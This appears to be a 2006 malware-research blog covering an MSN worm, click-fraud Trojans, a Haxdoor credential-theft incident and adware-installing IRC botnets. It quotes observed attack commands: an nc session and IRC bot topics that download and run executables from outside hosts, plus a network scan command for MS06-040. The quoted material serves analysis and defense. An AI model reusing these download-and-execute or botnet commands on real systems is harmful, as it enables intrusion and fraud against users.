malware

The very good weblog from F-Secure had recently an entry entitled "MSN Worm Used to Download Adware Programs" (thanks common for pointing this out!). For downloading additional malware to the infected hosts, it uses a very simple transfer mechanism on TCP port 80:

$ nc XXX.64.38.YYY 80

down http://www.lollpics.net/[Removed] a.exe;shell a.exe;

down http://promo.dollarrevenue.com/webmasterexe/[Removed] drsmartload1135a.exe;

shell drsmartload1135a.exe;

down http://www.uglyphotos.net/[Removed] Yinstall.exe;

shell Yinstall.exe;

down http://www.lollpics.net/[Removed] mny.exe;

shell mny.exe;

shell a.exe;

shell a.exe;

shell a.exe;

So the infected host just contacts XXX.64.38.YYY on TCP port 80 and then receives instructions to download several files, which are executed in the next step. Currently, four additional pieces of malware are installed on the compromised machine, on of them being again Adware related to dollarrevenue.com. A full analysis report (detailed XML report) generated by CWSandbox is also available.

And a link from a reader (thanks Jean-Philippe!): Trend Micro launches anti-botnet service. Seems like there are now several companies who offer such services, let's see who is successful...

Business Week had an interesting story about click fraud recently (also at /.). This seems to be a really lucrative business and there is of course also malware that helps the attacker to automatically generate clicks on websites.
One example of such a piece of malware is Trojan.Clicker (named by F-Secure), which currently also dominates the monthly world map of malware infections. The operation mode of this Trojan is rather simple: after the initial infect (e.g., download via bots), it remains resident in memory and periodically opens certain web pages with the help of Internet Explorer, thus generating clicks on that web page. Hence, the attacker automatically generates revenue from his compromised machines...
A more detailed analysis of a particular Trojan.Clicker variant is available as CWSandbox report.

Greetings from Hack In The Box 2006! I'm happy to announce that we have finally a public web interface to CWSandbox: just go to http://www.cwsandbox.org and submit a binary. A couple of minutes later, you should find an analysis in your e-mail inbox.

William Salusky over at ISC wrote:

"Malware analysts rejoice! A public submission interface for the CWSandox (NEW)

The public availability of a submission interface into the CWSandbox is finally at hand.

The CWSandbox has been a somewhat closely held tool in the professional security and AV researcher community for many months now. The CWSandbox results offer near immediate insight into the actions of malicious code execution on win32 based systems which in turn offers you, the affected party some quick intel on what might be happening on your network!

Please be kind and submit samples that you have vetted in some way as malicious. I'm sure this project would not be interested in receiving copies of your %SYSTEM% directory.

You can submit your malicious code samples via the sample web submission form at:
https://luigi.informatik.uni-mannheim.de/submit.php

CWSandbox results containing the sandbox/AV results are emailed to the submitter address.

This sandbox environment currently tracks malicious code variants against only three free/unnamed AV products at the moment. I'm confident that this project would be interested in hearing from commercial AV vendors willing to offer unix based solutions to further their detection effort.

Handler on duty
W"

Indeed, if AV vendors want to help us with some kind of AV engines, we are more than happy to hear from you :-) It is also possible to license CWSandbox if you want to use it at your site - for more information just contact thorsten [dot] holz [@] gmail [dot] com

Since the economics aspects of network attacks seem to be of interest to some people (eWEEK and /.) I blog more about it... But at first, let me thank Jens Hektor and Jan Göbel who analyzed the incident and provided me with further data - without them, I could not blog about this :-)

Recently there was a malware incident within the network of my old university in Aachen: Blast-o-Mat, a custom IDS system, picked up an infected machine and redirected it to a quarantine webserver. This way, the user is instantly noticed that something went wrong and he can download patches and AV engines at that web site. A closer examination revealed that the infected machine also did some strange web requests. It tried to post data to a PHP script located at a remote server. It turned out that this machine was infected with Haxdoor (F-Secure report), one of the most advanced Trojans out there nowadays. Haxdoor (AKA Goldun) is - among other things - capable of collecting private data like username/password combinations entered within Internet Explorer and has also some rootkit capabilities.

During further investigation, several log files which contained all information stolen from all infected machines could be found. In total, these log files contained more than 6,6 million entries, an equivalent of 285 MB of data. This data was stolen from the compromised machines between April 19 and April 27, 2006, so within only nine days. In total, more than 39,000 different IP addresses fell victim of this particular Haxdoor infection. This shows the effectiveness of this kind of attacks.

The vast majority of victims was located in Germany, most of them within IP ranges of dial-up users. This user group is an easy, yet very attractive, target for attackers: people who use the Internet at home for entertaining purposes are often not very security aware. Furthermore, patch management or additional
security software like anti-virus engines or host-based firewalls are unfamiliar terms for them. Thus an attacker can compromise these unpatched machines with the help of autonomous spreading software in the form of bots. Once he has complete control over the victim’s machine, he can use it to install additional tools, for example keylogger or even more advanced tools like Haxdoor.

Presumably the most severe form of identity theft caused by Haxdoor is information related to financial transactions. This Trojan monitors the use of Internet Explorer and sends captured data (e.g., URLs and content of HTML-forms) to a central logging server, and thus this very sensitive information can be
captured by the attacker. In the log files we found traces of at least 15 different banks whose customers were affected. Moreover, the log file contains at least complete information about 280 bank accounts and 28 credit card numbers with complete details. The rather low number of credit card details can be explained with the help of the nationality of the victims: in Germany, the usage of credit cards is not as common as in the US.

In addition, Haxdoor is capable of retrieving the information in the Protected Storage (PStore ) Service of infected machines which contains rather sensitive information as the following (sanitized) example shows:

-==; Protected Storage: 

Outlook: pop.gmx.net | PASS 

http://12090.forum.onetwomax.de/:StringData | USER PASS 

http://ksv-hessen.de/:StringData | USER PASS 

http://pixum.de/:StringData | e-Mail PASS 

http://www.fussballstammtisch.de:StringData | USER PASS 

http://www.willstequatschen.com/index.php:StringData | USER PASS 

-==; Account 

POP3 Server | pop.gmx.net 

POP3 User Name | e-Mail 

This information was handed over to the fine guys at DFN-CERT, the Computer Emergency Response Team responsible for German research and education networks. The affected users were warned in cooperation with universities, ISPs and other affected sites - at least as good as possible...

Running a botnet can be a lucrative way for an attacker to get some money. He can for example rent his bots to a spammer who then uses the SOCKS proxy on the compromised machines to send out tons of spam. Or he can install keylogger or tools to read out the Protected Storage in order to retrieve sensitive information from the victims. Or he can install Adware on those machines and earn some money that way.

Adware seems to be rather lucrative: recently we were monitoring several botnets that uses the MS06-040 (Vulnerability in Server Service Could Allow Remote Code Execution) vulnerability (PoC). One of those botnets used the following channel structure:

• # f00 #: .ircraw join # scan #,,# frame ## Do #,# a #
• # scan #: .scan netapi 100 3 0 -r -b -s
• # frame #: .download http://XXXsikpgz.com/dl/loadadv518.exe c:\lsas.exe 1 -s
• # Do #: .download http://promo.dollarrevenue.com/webmasterexe/drsmartloadXXXa.exe c:\do.exe 1 -s
• # a #: .download http://YYY.19.23.XXX/~from/taskmgr.exe c:\taskmgr.exe 1 -s

The main channel f00 is just used to dispatch all incoming bots. The bots join four different channels:

1. # scan # is used to propagate further, all bots search other victims
2. Adware is installed on all compromised machines with the topic of channel # frame #
3. Another piece of Adware is installed in channel # Do # - in this case a binary from http://www.dollarrevenue.com/
4. Finally, the channel # a # installs an additional binary on all bots.

Ok, and how much can a botherd earn with this kind of attacks? Taking a quick look at the numbers reveals the following result: DollarRevenue pays per install, depending on the country the bot is installed in. Within 24 hours, this botnet compromised a little over 7700 machines. Doing some quick math leads to the following result:

$ grep US 2006-08-28.log | wc -l 

998 

$ grep CAN 2006-08-28.log | wc -l 

20 

$ grep GBR 2006-08-28.log | wc -l 

103 

$ grep CHN 2006-08-28.log | wc -l 

756 

$ egrep -v "US|CAN|GBR|CHN”  2006-08-28.log | wc -l 

5852 



998 x $0.3 + 20 x $0.2 + 103 x $0.1 + 756 x $0.01 + 5852 x $0.02 = $438.30

So he earns more than $430 on a single day just with DollarRevenue, presumably a similar sum with the other pieces of Adware. Not a bad income for doing almost no work ;-)